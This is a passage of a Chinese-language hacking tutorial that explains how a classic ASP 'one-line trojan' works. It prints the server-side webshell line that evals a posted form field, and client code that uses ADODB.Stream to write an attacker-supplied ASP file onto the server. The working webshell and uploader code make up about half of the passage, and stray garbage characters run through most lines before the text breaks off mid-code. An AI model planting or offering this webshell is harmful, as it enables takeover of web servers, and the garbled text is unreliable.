就拿我们经常使用的冰狐大哥的一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理. *~4<CP+"0
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: s o1
<textarea name=# cols="80" rows="10"> yPT o,,ca=
set iP=server.createObject("Adodb.Stream") 5D=U.UdR
iP.Open ]@cI _n
iP.Type=2 d&L
iP.CharSet="gb2312" r_ +!3
iP.writetext request("aoyun") uH?4d!G
iP.SaveToFile server.mappath("aoyunwan.asp"),2 #g@4c3um|
iP.Close x^_c4,i)
set iP=nothing a!4p$pR
response.redirect "aoyunwan.asp" = 03G~7B>
</textarea> cUP1Uolvn
学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了: O"|d~VQ
set iP=server.createObject("Adodb.Stream") .b`8
+
iP.Open 7p\&